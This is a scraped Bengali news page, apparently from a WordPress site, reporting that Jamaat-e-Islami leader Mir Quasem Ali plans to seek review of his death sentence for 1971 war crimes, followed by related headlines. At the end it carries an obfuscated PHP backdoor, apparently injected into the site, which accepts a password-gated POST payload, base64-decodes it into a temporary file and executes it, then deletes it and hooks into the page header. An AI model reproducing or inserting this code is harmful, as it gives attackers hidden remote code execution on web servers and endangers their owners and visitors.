শনিবার, ২২শে জুন, ২০২৪ খ্রিস্টাব্দ ৮ই আষাঢ়, ১৪৩১ বঙ্গাব্দ

রিভিউ করবেন মীর কাসেম আলী

meer_kashemamarনিউজ ডেস্ক : একাত্তরে মানবতাবিরোধী অপরাধে সর্বোচ্চ আদালতের দেওয়া মৃত্যুদণ্ড রায় পুনর্বিবেচনার (রিভিউ) আবেদন করবেন জামায়াতে ইসলামীর নির্বাহী পরিষদের সদস্য মীর কাসেম আলী। শনিবার (১১জুন) তার সঙ্গে গাজীপুরের কাশিমপুর কেন্দ্রীয় কারাগারে ছেলে ও আইনজীবীরা দেখা করতে গেলে মীর কাসেম আলী এ কথা জানান।

মীর কাসেম আলীর আইনজীবী মতিউর রহমান আকন্দ বলেন, মীর কাসেম আলী মৃত্যুদণ্ড রায় পুনর্বিবেচনার আবেদন করবেন বলে জানিয়েছেন। এ জন্য আমাদের প্রস্তুতি নিতে বলেছেন।

এর আগে শনিবার সকাল ১১টার দিকে কারাগারে মীর কাসেম আলীর সঙ্গে সাক্ষাৎ করেন ছেলে ও আইনজীবীসহ ৫ জন। যারা সাক্ষাৎ করেছেন তারা হলেন মীর কাসেম আলীর ছেলে ব্যারিস্টার মীর আহমেদ বিন কাসেম, আইনজীবী মতিউর রহমান আকন্দ, বজলুর রহমান খান, নূর উল্ল্যহ ও নাজিবুর রহমান।

কাশিমপুর কারাগার-২ এর জেল সুপার প্রশান্ত কুমার বণিক জানান, মীর কাসেম আলীর ছেলে ও আইনজীবীরা সকাল সাড়ে ১১টার দিকে কারাগারে এসে সাক্ষাতের জন্য আবেদন করেন। পরে তাদের পৌনে ১২টার দিকে সাক্ষতের সুযোগ দেওয়া হয়। রিভিউর ব্যাপারে আইনজীবী ও মীর কাসেম আলীর সঙ্গে প্রায় ৪৫ মিনিট কারাগারের ভেতর কথা হয়। দুপুর পৌনে ১টার দিকে আইনজীবীরা কারাফটক থেকে বেরিয়ে যান।

জামায়াতের কেন্দ্রীয় এ নেতার বিরুদ্ধে একাত্তরে চট্টগ্রামে খুন, অপহরণসহ ১৪টি অভিযোগ আনা হয়। এসব অভিযোগের মধ্যে ১০টি প্রমাণিত হয়। এর মধ্যে অন্যতম কিশোর মুক্তিযোদ্ধা জসিমসহ ছয়জনকে অপহরণের পর নির্যাতন কেন্দ্রে আটকে রেখে হত্যা এবং পরে তাদের মৃতদেহ নদীতে ফেলে দেয়া হয়। এই অভিযোগে তিন বিচারকের সমন্বয়ে আন্তর্জাতিক অপরাধ ট্রাইব্যুনাল সর্বসম্মতিক্রমে মীর কাসেম আলীকে সর্বোচ্চ দণ্ডের এ আদেশ দেয়। ট্রাইব্যুনাল এ রায় দেয় ২০১৪ সালের নভেম্বরে।

ওই রায়ের বিরুদ্ধে আপিল বিভাগে আবেদন করেন মীর কাশেম আলী। দু’পক্ষের যুক্তিতর্ক শেষে গত ৮ মার্চ ট্রাইব্যুনালের দেয়া মৃত্যুদণ্ডের আদেশ বহাল রেখেছেন সুপ্রিম কোর্টের আপিল বিভাগ। প্রধান বিচারপতি এস কে সিনহার নেতৃত্বে পাঁচ সদস্যের আপিল বেঞ্চ এ রায় দেন।পুর্ণাঙ্গ রায় প্রকাশের পর মৃত্যু পরোয়ানা জারি করে ট্রাইব্যুনাল। গত ৭ জুন মীর কাসেম আলীকে কারাগারে ওই পরোয়ানা পড়ে শুনানো হয়।

এ জাতীয় আরও খবর

গোপালগঞ্জে ‘কথা বলা’ গাছের পেছনে ছুটছে মানুষ!

১১ ওভারে ১৩০ করে রান রেট বাড়িয়ে নিল উইন্ডিজ

ছয় মাসের অন্তঃসত্ত্বা দীপিকা, বেবিবাম্প নিয়ে এলেন প্রকাশ্যে

বেশি মাংসে স্বাস্থ্যঝুঁকি

সানিয়া-শামির বিয়ের গুঞ্জন, মুখ খুললেন টেনিস সুন্দরীর বাবা

সকালেই এক পশলা বৃষ্টিতে ভিজল ঢাকা

পবিত্র হজ পালন শেষে দেশে ফিরেছেন ৩৯২০ জন‌, ৩৫ হাজীর মৃত্যু

গান ছাড়া জীবন অচল অভিনেত্রী মিমির!

বিচ্ছেদ লড়াইয়ের মাঝে সন্তান চাইলেন ব্রাড পিট

গোল মিসের মহড়া: অপেক্ষা বাড়ল ফ্রান্স ও ডাচদের

গাজায় রেড ক্রিসেন্ট দপ্তরের কাছে হামলা, নিহত ২২

অংশীদারত্বের উন্নয়নে প্রধানমন্ত্রীর নির্দেশনার প্রশংসা জয়শঙ্ক‌রের

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}